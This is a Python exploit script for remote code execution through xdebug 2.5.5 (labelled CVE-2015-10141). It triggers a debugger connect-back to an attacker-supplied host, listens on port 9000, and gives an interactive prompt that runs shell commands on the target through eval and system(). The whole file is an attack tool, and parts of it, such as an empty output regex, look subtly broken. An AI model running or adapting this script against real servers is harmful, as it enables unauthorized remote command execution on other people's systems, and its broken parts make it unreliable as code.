#!/usr/bin/env python3 # Libraries import socket import base64 import sys import threading import time import argparse import requests import re import pdb # Colors class c: PURPLE = '\033[95m' BLUE = '\033[94m' CYAN = '\033[96m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' # Banner Function def banner(): print(c.YELLOW + "\n██╗ ██╗██████╗ ███████╗██████╗ ██╗ ██╗ ██████╗ ") print("╚██╗██╔╝██╔══██╗██╔════╝██╔══██╗██║ ██║██╔════╝ ") print(" ╚███╔╝ ██║ ██║█████╗ ██████╔╝██║ ██║██║ ███╗ - By D3Ext") print(" ██╔██╗ ██║ ██║██╔══╝ ██╔══██╗██║ ██║██║ ██║") print("██╔╝ ██╗██████╔╝███████╗██████╔╝╚██████╔╝╚██████╔╝") print("╚═╝ ╚═╝╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚═════╝ " + c.END) # Argument parser Function def parse(): parser = argparse.ArgumentParser(description="CVE-2015-10141 - xdebug v2.5.5 RCE Exploit") parser.add_argument('-u', '--url', help="URL of the target", required=True) parser.add_argument('-l', '--lhost', help="LHOST to trigger the RCE", required=True) return parser.parse_args() # RCE Function def trigger_rce(url,lhost): time.sleep(1) if url.endswith(".php"): url = url + "?XDEBUG_SESSION_START=phpstorm" elif url.endswith("/"): url = url + "index.php?XDEBUG_SESSION_START=phpstorm" else: url = url + "/index.php?XDEBUG_SESSION_START=phpstorm" rce_headers = { 'X-Forwarded-For': '%s' % lhost } try: r = requests.get(url, headers=rce_headers) except: print(c.BLUE + "\n[" + c.END + c.YELLOW + "!" + c.END + c.BLUE + "] Target not vulnerable or error triggering the exploit\n" + c.END) # Main args = parse() url = args.url lhost = args.lhost # Start a thread triggering the RCE t = threading.Thread(target=trigger_rce, args=(url,lhost)) t.start() try: # Create socket and start program banner() ip_port = ('0.0.0.0', 9000) print(c.BLUE + "\n[" + c.END + c.YELLOW + "+" + c.END + c.BLUE + "] XDEBUG exploit served on port 9000, waiting for connections" + c.END) print(c.BLUE + "[" + c.END + c.YELLOW + "+" + c.END + c.BLUE + "] Attempting to trigger the RCE" + c.END) sk = socket.socket() sk.bind(ip_port) sk.listen(10) conn, addr = sk.accept() # If any error print this except Exception as e: print(c.BLUE + "\n[" + c.END + c.YELLOW + "!" + c.END + c.BLUE + "] Error serving exploit on port 9000\n" + c.END) sys.exit(0) # If a connection is received enter the loop and execute php code counter=0 rce_output="" print(c.BLUE + "\n[" + c.END + c.YELLOW + "+" + c.END + c.BLUE + "] Exploit triggered successfully" + c.END) print(c.BLUE + "[" + c.END + c.YELLOW + "+" + c.END + c.BLUE + "] Now you can execute shell commands" + c.END) print(c.BLUE + "[" + c.END + c.YELLOW + "+" + c.END + c.BLUE + "] Press Ctrl+C to exit" + c.END) try: while True: client_data = conn.recv(1024) rce_output = re.findall(r'', str(client_data))[0] # Check if the vulnerability has been already exploited if counter == 1: try: # Decode output rce_output = base64.b64decode(rce_output) print(str(rce_output)) except: pass command = input(c.BLUE + "\n[" + c.YELLOW + "#" + c.END + c.BLUE + "] Enter command >> " + c.END) if command == "exit" or command == "quit": conn.close() print(c.BLUE + "\n[" + c.END + c.YELLOW + "!" + c.END + c.BLUE + "] Exiting...\n" + c.END) sys.exit(0) counter=1 # Send command conn.send(b'eval -i 1 -- system(\"%s\");\x00' % base64.b64encode(command.encode())) except KeyboardInterrupt: print(c.BLUE + "\n\n[" + c.END + c.YELLOW + "!" + c.END + c.BLUE + "] Exiting...\n" + c.END) sys.exit(0)